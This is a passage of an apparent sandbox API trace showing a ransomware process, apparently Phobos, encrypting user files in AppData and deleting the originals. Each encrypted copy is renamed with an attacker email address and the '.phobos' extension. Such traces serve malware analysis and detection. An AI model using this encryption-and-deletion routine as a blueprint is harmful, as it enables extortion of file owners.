hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0192.627] CryptDestroyKey (hKey=0xa32a68) returned 1 [0192.627] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0192.627] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.627] CloseHandle (hObject=0x194) returned 1 [0192.627] CloseHandle (hObject=0x178) returned 1 [0192.627] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml")) returned 1 [0192.628] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.629] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32768) returned 1 [0192.629] CloseHandle (hObject=0x178) returned 1 [0192.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat")) returned 0x2026 [0192.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.629] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.630] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.632] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.632] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8000, lpOverlapped=0x0) returned 1 [0192.761] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010, dwBufLen=0x8010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010) returned 1 [0192.761] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8010, lpOverlapped=0x0) returned 1 [0192.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0192.762] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.763] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0192.763] CryptDestroyKey (hKey=0xa32be8) returned 1 [0192.763] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0192.763] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.763] CloseHandle (hObject=0x178) returned 1 [0192.763] CloseHandle (hObject=0x194) returned 1 [0192.763] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat")) returned 1 [0192.764] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xJFAf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xjfaf.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.798] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=68295) returned 1 [0192.799] CloseHandle (hObject=0x194) returned 1 [0192.799] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xJFAf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xjfaf.m4a")) returned 0x2020 [0192.799] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xJFAf.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xjfaf.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xJFAf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xjfaf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.799] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.799] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xJFAf.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xjfaf.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.799] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.799] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.799] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10ac7, lpOverlapped=0x0) returned 1 [0192.801] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10ad0, dwBufLen=0x10ad0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10ad0) returned 1 [0192.801] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10ad0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10ad0, lpOverlapped=0x0) returned 1 [0192.804] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0192.804] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.804] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0192.804] CryptDestroyKey (hKey=0xa32be8) returned 1 [0192.804] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0192.804] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.804] CloseHandle (hObject=0x194) returned 1 [0192.804] CloseHandle (hObject=0x178) returned 1 [0192.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4xJFAf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4xjfaf.m4a")) returned 1 [0192.805] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zRGZMLtqc2sORLSkF.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zrgzmltqc2sorlskf.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.806] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=54077) returned 1 [0192.806] CloseHandle (hObject=0x178) returned 1 [0192.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zRGZMLtqc2sORLSkF.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zrgzmltqc2sorlskf.pps")) returned 0x2020 [0192.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zRGZMLtqc2sORLSkF.pps.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zrgzmltqc2sorlskf.pps.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zRGZMLtqc2sORLSkF.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zrgzmltqc2sorlskf.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.806] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.806] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zRGZMLtqc2sORLSkF.pps.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zrgzmltqc2sorlskf.pps.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.807] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.807] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd33d, lpOverlapped=0x0) returned 1 [0192.808] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd340, dwBufLen=0xd340 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd340) returned 1 [0192.809] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd340, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd340, lpOverlapped=0x0) returned 1 [0192.810] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0192.810] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.810] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0192.810] CryptDestroyKey (hKey=0xa32be8) returned 1 [0192.810] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0192.810] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.810] CloseHandle (hObject=0x178) returned 1 [0192.810] CloseHandle (hObject=0x194) returned 1 [0192.811] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zRGZMLtqc2sORLSkF.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zrgzmltqc2sorlskf.pps")) returned 1 [0192.817] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.819] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0192.819] CloseHandle (hObject=0x194) returned 1 [0192.819] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.820] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10) returned 1 [0192.820] CloseHandle (hObject=0x194) returned 1 [0192.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js")) returned 0x2020 [0192.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.820] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.820] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0192.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0192.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0192.915] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.915] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa, lpOverlapped=0x0) returned 1 [0192.916] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10, dwBufLen=0x10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10) returned 1 [0192.916] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10, lpOverlapped=0x0) returned 1 [0192.917] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0192.917] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0192.917] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0192.917] CryptDestroyKey (hKey=0xa32be8) returned 1 [0192.917] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0192.917] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.917] CloseHandle (hObject=0x194) returned 1 [0192.917] CloseHandle (hObject=0x178) returned 1 [0192.917] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js")) returned 1 [0192.918] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0192.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DxhDeU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxhdeu.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.275] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=20325) returned 1 [0193.275] CloseHandle (hObject=0x164) returned 1 [0193.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DxhDeU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxhdeu.bmp")) returned 0x2020 [0193.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DxhDeU.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxhdeu.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DxhDeU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxhdeu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.275] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.275] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0193.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DxhDeU.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxhdeu.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0193.276] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.276] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4f65, lpOverlapped=0x0) returned 1 [0193.277] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4f70, dwBufLen=0x4f70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4f70) returned 1 [0193.278] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4f70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4f70, lpOverlapped=0x0) returned 1 [0193.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0193.278] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0193.279] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0193.279] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.279] 